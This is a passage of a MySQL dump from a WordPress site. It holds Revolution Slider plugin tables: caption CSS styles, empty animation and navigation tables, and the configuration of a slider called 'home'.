88)\",\"border-style\":\"none\"}',NULL),(26,'.tp-caption.small_thin_grey',NULL,NULL,'{\"font-size\":\"18px\",\"line-height\":\"26px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(117, 117, 117)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"1px 4px 0px\",\"text-shadow\":\"none\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}',NULL),(27,'.tp-caption.lightgrey_divider',NULL,NULL,'{\"text-decoration\":\"none\",\"background-color\":\"rgba(235, 235, 235, 1)\",\"width\":\"370px\",\"height\":\"3px\",\"background-position\":\"initial initial\",\"background-repeat\":\"initial initial\",\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}',NULL),(28,'.tp-caption.large_bold_darkblue',NULL,NULL,'{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(52, 73, 94)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}',NULL),(29,'.tp-caption.medium_bg_darkblue',NULL,NULL,'{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(52, 73, 94)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}',NULL),(30,'.tp-caption.medium_bold_red',NULL,NULL,'{\"font-size\":\"24px\",\"line-height\":\"30px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(227, 58, 12)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}',NULL),(31,'.tp-caption.medium_light_red',NULL,NULL,'{\"font-size\":\"21px\",\"line-height\":\"26px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(227, 58, 12)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}',NULL),(32,'.tp-caption.medium_bg_red',NULL,NULL,'{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(227, 58, 12)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}',NULL),(33,'.tp-caption.medium_bold_orange',NULL,NULL,'{\"font-size\":\"24px\",\"line-height\":\"30px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(243, 156, 18)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}',NULL),(34,'.tp-caption.medium_bg_orange',NULL,NULL,'{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(243, 156, 18)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}',NULL),(35,'.tp-caption.grassfloor',NULL,NULL,'{\"text-decoration\":\"none\",\"background-color\":\"rgba(160, 179, 151, 1)\",\"width\":\"4000px\",\"height\":\"150px\",\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}',NULL),(36,'.tp-caption.large_bold_white',NULL,NULL,'{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}',NULL),(37,'.tp-caption.medium_light_white',NULL,NULL,'{\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}',NULL),(38,'.tp-caption.mediumlarge_light_white',NULL,NULL,'{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}',NULL),(39,'.tp-caption.mediumlarge_light_white_center',NULL,NULL,'{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px 0px 0px 0px\",\"text-align\":\"center\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}',NULL),(40,'.tp-caption.medium_bg_asbestos',NULL,NULL,'{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(127, 140, 141)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}',NULL),(41,'.tp-caption.medium_light_black',NULL,NULL,'{\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}',NULL),(42,'.tp-caption.large_bold_black',NULL,NULL,'{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}',NULL),(43,'.tp-caption.mediumlarge_light_darkblue',NULL,NULL,'{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(52, 73, 94)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}',NULL),(44,'.tp-caption.small_light_white',NULL,NULL,'{\"font-size\":\"17px\",\"line-height\":\"28px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}',NULL),(45,'.tp-caption.roundedimage',NULL,NULL,'{\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}',NULL),(46,'.tp-caption.large_bg_black',NULL,NULL,'{\"font-size\":\"40px\",\"line-height\":\"40px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(0, 0, 0)\",\"padding\":\"10px 20px 15px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}',NULL),(47,'.tp-caption.mediumwhitebg',NULL,NULL,'{\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(255, 255, 255)\",\"padding\":\"5px 15px 10px\",\"text-shadow\":\"none\",\"border-width\":\"0px\",\"border-color\":\"rgb(0, 0, 0)\",\"border-style\":\"none\"}',NULL);
/*!40000 ALTER TABLE `wp_revslider_css_bkp` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_revslider_layer_animations`
--

DROP TABLE IF EXISTS `wp_revslider_layer_animations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_revslider_layer_animations` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `handle` text NOT NULL,
  `params` text NOT NULL,
  `settings` text,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_revslider_layer_animations`
--

LOCK TABLES `wp_revslider_layer_animations` WRITE;
/*!40000 ALTER TABLE `wp_revslider_layer_animations` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_revslider_layer_animations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_revslider_layer_animations_bkp`
--

DROP TABLE IF EXISTS `wp_revslider_layer_animations_bkp`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_revslider_layer_animations_bkp` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `handle` text NOT NULL,
  `params` text NOT NULL,
  `settings` text,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_revslider_layer_animations_bkp`
--

LOCK TABLES `wp_revslider_layer_animations_bkp` WRITE;
/*!40000 ALTER TABLE `wp_revslider_layer_animations_bkp` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_revslider_layer_animations_bkp` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_revslider_navigations`
--

DROP TABLE IF EXISTS `wp_revslider_navigations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_revslider_navigations` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `name` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL,
  `handle` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL,
  `type` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL,
  `css` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `markup` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `settings` longtext COLLATE utf8mb4_unicode_ci,
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_revslider_navigations`
--

LOCK TABLES `wp_revslider_navigations` WRITE;
/*!40000 ALTER TABLE `wp_revslider_navigations` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_revslider_navigations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_revslider_navigations_bkp`
--

DROP TABLE IF EXISTS `wp_revslider_navigations_bkp`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_revslider_navigations_bkp` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `name` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL,
  `handle` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL,
  `type` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL,
  `css` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `markup` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `settings` longtext COLLATE utf8mb4_unicode_ci,
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_revslider_navigations_bkp`
--

LOCK TABLES `wp_revslider_navigations_bkp` WRITE;
/*!40000 ALTER TABLE `wp_revslider_navigations_bkp` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_revslider_navigations_bkp` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_revslider_settings`
--

DROP TABLE IF EXISTS `wp_revslider_settings`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_revslider_settings` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `general` text NOT NULL,
  `params` text NOT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_revslider_settings`
--

LOCK TABLES `wp_revslider_settings` WRITE;
/*!40000 ALTER TABLE `wp_revslider_settings` DISABLE KEYS */;
INSERT INTO `wp_revslider_settings` VALUES (1,'a:0:{}','');
/*!40000 ALTER TABLE `wp_revslider_settings` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_revslider_sliders`
--

DROP TABLE IF EXISTS `wp_revslider_sliders`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_revslider_sliders` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `title` tinytext NOT NULL,
  `alias` tinytext,
  `params` longtext NOT NULL,
  `settings` text,
  `type` varchar(191) NOT NULL DEFAULT '',
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_revslider_sliders`
--

LOCK TABLES `wp_revslider_sliders` WRITE;
/*!40000 ALTER TABLE `wp_revslider_sliders` DISABLE KEYS */;
INSERT INTO `wp_revslider_sliders` VALUES (1,'home','home','{\"id\":\"\",\"shortcode\":\"[rev_slider home]\",\"layouttype\":\"fixed\",\"type\":\"standard\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"addOns\":[],\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":\"55\",\"maxPosts\":\"30\",\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":55,\"maxProducts\":30,\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":\"\",\"hashTag\":\"\",\"transient\":1200,\"type\":\"user\",\"userId\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":\"\",\"pageURL\":\"\",\"transient\":1200,\"typeSource\":\"album\"},\"flickr\":{\"apiKey\":\"\",\"count\":\"\",\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":1200,\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":\"\",\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":1200,\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":\"\",\"transient\":1200,\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":\"\",\"playList\":\"\",\"transient\":1200,\"typeSource\":\"channel\"}},\"def\":{\"transition\":\"fade\",\"transitionDuration\":1000,\"delay\":\"7000\",\"background\":{\"fit\":\"cover\",\"fitX\":100,\"fitY\":100,\"position\":\"center center\",\"positionX\":0,\"positionY\":0,\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":0,\"blurEnd\":0,\"duration\":\"\",\"ease\":\"none\",\"fitEnd\":100,\"fitStart\":100,\"xEnd\":0,\"yEnd\":0,\"xStart\":0,\"yStart\":0,\"rotateStart\":0,\"rotateEnd\":0}},\"size\":{\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"gridEQModule\":false,\"custom\":{\"d\":true,\"n\":false,\"t\":false,\"m\":false},\"minHeightFullScreen\":\"\",\"minHeight\":\"0\",\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":700,\"n\":1024,\"t\":778,\"m\":480},\"height\":{\"d\":500,\"n\":768,\"t\":960,\"m\":720},\"overflow\":false,\"maxWidth\":\"\"},\"codes\":{\"css\":\"\",\"javascript\":\"\"},\"carousel\":{\"borderRadius\":0,\"borderRadiusUnit\":\"px\",\"ease\":\"power3.inOut\",\"fadeOut\":true,\"scale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":3,\"maxRotation\":0,\"paddingTop\":0,\"paddingBottom\":0,\"rotation\":false,\"scaleDown\":50,\"space\":0,\"speed\":800,\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":false},\"hero\":{\"activeSlide\":-1},\"layout\":{\"bg\":{\"color\":\"#E9E9E9\",\"padding\":0,\"dottedOverlay\":\"none\",\"shadow\":\"1\",\"useImage\":false,\"image\":\"\",\"fit\":\"cover\",\"position\":\"center top\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#FFFFFF\",\"type\":\"0\"},\"position\":{\"marginTop\":0,\"marginBottom\":0,\"marginLeft\":0,\"marginRight\":0,\"align\":\"center\"}},\"visibility\":{\"hideSelectedLayersUnderLimit\":0,\"hideAllLayersUnderLimit\":0,\"hideSliderUnderLimit\":0},\"general\":{\"slideshow\":{\"stopOnHover\":true,\"stopSlider\":false,\"stopAfterLoops\":0,\"stopAtSlide\":2,\"shuffle\":false,\"loopSingle\":\"loop\",\"viewPort\":false,\"viewPortStart\":\"wait\",\"viewPortArea\":\"40%\",\"presetSliderHeight\":false,\"initDelay\":0,\"waitForInit\":false,\"slideShow\":true},\"progressbar\":{\"set\":true,\"height\":5,\"position\":\"top\",\"color\":\"#FFFFFF\"},\"firstSlide\":{\"set\":false,\"duration\":300,\"slotAmount\":7,\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":\"1\"},\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false},\"nav\":{\"preview\":{\"width\":100,\"height\":50},\"swipe\":{\"set\":true,\"setOnDesktop\":false,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":1,\"velocity\":75},\"keyboard\":{\"set\":false,\"direction\":\"horizontal\"},\"mouse\":{\"set\":false,\"reverse\":\"default\"},\"arrows\":{\"set\":false,\"rtl\":false,\"style\":\"\",\"preset\":\"default\",\"presets\":{},\"alwaysOn\":false,\"hideDelay\":200,\"hideDelayMobile\":1200,\"hideOver\":false,\"hideOverLimit\":0,\"hideUnder\":false,\"hideUnderLimit\":778,\"left\":{\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":20,\"offsetY\":0,\"align\":\"slider\"},\"right\":{\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":20,\"offsetY\":0,\"align\":\"slider\"}},\"thumbs\":{\"set\":false,\"rtl\":false,\"style\":\"\",\"preset\":\"default\",\"presets\":{},\"alwaysOn\":false,\"hideDelay\":200,\"hideDelayMobile\":1200,\"hideOver\":false,\"hideOverLimit\":0,\"hideUnder\":false,\"hideUnderLimit\":778,\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":5,\"direction\":\"horizontal\",\"height\":50,\"width\":100,\"widthMin\":100,\"innerOuter\":\"inner\",\"offsetX\":0,\"offsetY\":20,\"space\":5,\"align\":\"slider\",\"padding\":5,\"wrapperColor\":\"transparent\"},\"tabs\":{\"set\":false,\"rtl\":false,\"style\":\"\",\"preset\":\"default\",\"presets\":{},\"alwaysOn\":false,\"hideDelay\":200,\"hideDelayMobile\":1200,\"hideOver\":false,\"hideOverLimit\":0,\"hideUnder\":false,\"hideUnderLimit\":778,\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":5,\"direction\":\"horizontal\",\"height\":50,\"width\":100,\"widthMin\":100,\"innerOuter\":\"inner\",\"offsetX\":0,\"offsetY\":20,\"space\":5,\"align\":\"slider\",\"padding\":5,\"wrapperColor\":\"transparent\"},\"bullets\":{\"set\":\"\",\"rtl\":\"\",\"style\":\"\",\"preset\":\"default\",\"presets\":{},\"alwaysOn\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":0,\"offsetY\":20,\"align\":\"slider\",\"space\":5,\"hideDelay\":200,\"hideDelayMobile\":1200,\"hideOver\":false,\"hideOverLimit\":0,\"hideUnder\":false,\"hideUnderLimit\":778}},\"troubleshooting\":{\"ignoreHeightChanges\":\"\",\"ignoreHeightChangesUnderLimit\":0,\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"alternateURLId\":false,\"jsNoConflict\":true,\"jsInBody\":false,\"outPutFilter\":\"none\",\"debugMode\":\"\",\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":true,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\",\"45\",\"50\",47,48,49,50,51,30],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":65},\"mouse\":{\"speed\":1000,\"bgSpeed\":0,\"layersSpeed\":0,\"origo\":\"slideCenter\",\"type\":\"mouse\"}},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"maxBlur\":10,\"multiplicator\":\"1.35\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":false,\"tilt\":\"30\",\"layers\":false}}','{\"version\":\"6.2.0\"}','');
/*!40000 ALTER TABLE `wp_revslider_sliders` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_revslider_sliders_bkp`
--

DROP TABLE IF EXISTS `wp_revslider_sliders_bkp`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_revslider_sliders_bkp` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `title` tinytext NOT NULL,
  `alias` tinytext,
  `params` longtext NOT NULL,
  `settings` text,
  `type` varchar(191) NOT NULL DEFAULT '',
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_revslider_sliders_bkp`
--

LOCK TABLES `wp_revslider_sliders_bkp` WRITE;
/*!40000 ALTER TABLE `wp_revslider_sliders_bkp` DISABLE KEYS */;
INSERT INTO `wp_revslider_sliders_bkp` VALUES (1,'home','home','{\"title\":\"home\",\"alias\":\"home\",\"shortcode\":\"[rev_slider home]\",\"source_type\":\"gallery\",\"post_types\":\"post\",\"post_category\":\"\",\"post_sortby\":\"ID\",\"posts_sort_direction\":\"DESC\",\"max_slider_posts\":\"30\",\"excerpt_limit\":\"55\",\"slider_template_id\":\"\",\"posts_list\":\"\",\"slider_type\":\"fixed\",\"fullscreen_offset_container\":\"\",\"fullscreen_offset_size\":\"\",\"fullscreen_min_height\":\"\",\"full_screen_align_force\":\"off\",\"auto_height\":\"off\",\"force_full_width\":\"off\",\"min_height\":\"0\",\"width\":\"700\",\"height\":\"500\",\"responsitive_w1\":\"940\",\"responsitive_sw1\":\"770\",\"responsitive_w2\":\"780\",\"responsitive_sw2\":\"500\",\"responsitive_w3\":\"510\",\"responsitive_sw3\":\"310\",\"responsitive_w4\":\"0\",\"responsitive_sw4\":\"0\",\"responsitive_w5\":\"0\",\"responsitive_sw5\":\"0\",\"responsitive_w6\":\"0\",\"responsitive_sw6\":\"0\",\"delay\":\"7000\",\"shuffle\":\"off\",\"lazy_load\":\"off\",\"use_wpml\":\"off\",\"enable_static_layers\":\"off\",\"next_slide_on_window_focus\":\"off\",\"start_js_after_delay\":0,\"stop_slider\":\"off\",\"stop_after_loops\":0,\"stop_at_slide\":2,\"show_timerbar\":\"top\",\"loop_slide\":\"loop\",\"position\":\"center\",\"margin_top\":0,\"margin_bottom\":0,\"margin_left\":0,\"margin_right\":0,\"shadow_type\":\"1\",\"padding\":0,\"background_color\":\"#E9E9E9\",\"background_dotted_overlay\":\"none\",\"show_background_image\":\"false\",\"background_image\":\"\",\"bg_fit\":\"cover\",\"bg_repeat\":\"no-repeat\",\"bg_position\":\"center top\",\"stop_on_hover\":\"on\",\"keyboard_navigation\":\"off\",\"navigation_style\":\"round\",\"navigaion_type\":\"bullet\",\"navigation_arrows\":\"solo\",\"navigaion_always_on\":\"false\",\"hide_thumbs\":200,\"navigaion_align_hor\":\"center\",\"navigaion_align_vert\":\"bottom\",\"navigaion_offset_hor\":\"0\",\"navigaion_offset_vert\":20,\"leftarrow_align_hor\":\"left\",\"leftarrow_align_vert\":\"center\",\"leftarrow_offset_hor\":20,\"leftarrow_offset_vert\":0,\"rightarrow_align_hor\":\"right\",\"rightarrow_align_vert\":\"center\",\"rightarrow_offset_hor\":20,\"rightarrow_offset_vert\":0,\"thumb_width\":100,\"thumb_height\":50,\"thumb_amount\":5,\"use_spinner\":\"0\",\"spinner_color\":\"#FFFFFF\",\"use_parallax\":\"on\",\"disable_parallax_mobile\":\"off\",\"parallax_type\":\"mouse\",\"parallax_bg_freeze\":\"off\",\"parallax_level_1\":\"5\",\"parallax_level_2\":\"10\",\"parallax_level_3\":\"15\",\"parallax_level_4\":\"20\",\"parallax_level_5\":\"25\",\"parallax_level_6\":\"30\",\"parallax_level_7\":\"35\",\"parallax_level_8\":\"40\",\"parallax_level_9\":\"45\",\"parallax_level_10\":\"50\",\"touchenabled\":\"on\",\"swipe_velocity\":75,\"swipe_min_touches\":1,\"drag_block_vertical\":\"false\",\"disable_on_mobile\":\"off\",\"disable_kenburns_on_mobile\":\"off\",\"hide_slider_under\":0,\"hide_defined_layers_under\":0,\"hide_all_layers_under\":0,\"hide_arrows_on_mobile\":\"off\",\"hide_bullets_on_mobile\":\"off\",\"hide_thumbs_on_mobile\":\"off\",\"hide_thumbs_under_resolution\":0,\"hide_thumbs_delay_mobile\":1500,\"start_with_slide\":\"1\",\"first_transition_active\":\"false\",\"first_transition_type\":\"fade\",\"first_transition_duration\":300,\"first_transition_slot_amount\":7,\"simplify_ie8_ios4\":\"off\",\"show_alternative_type\":\"off\",\"show_alternate_image\":\"\",\"reset_transitions\":\"fade\",\"reset_transition_duration\":0,\"0\":\"Execute settings on all slides\",\"jquery_noconflict\":\"on\",\"js_to_body\":\"false\",\"output_type\":\"none\",\"custom_css\":\"\",\"custom_javascript\":\"\",\"template\":\"false\"}',NULL,'');
/*!40000 ALTER TABLE `wp_revslider_sliders_bkp` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_revslider_slides`
--

DROP TABLE IF EXISTS `wp_revslider_slides`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_revslider_slides` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `slider_id` int(9) NOT NULL,
  `slide_order` int(11) NOT NULL,
  `params` longtext NOT NULL,
  `layers` longtext NOT NULL,
  `settings` text NOT NULL,
  UNIQUE KEY `id` (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=8 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_revslider_slides`
--

LOCK TABLES `wp_revslider_slides` WRITE;
/*!40000 ALTER TABLE `wp_revslider_slides` DISABLE KEYS */;
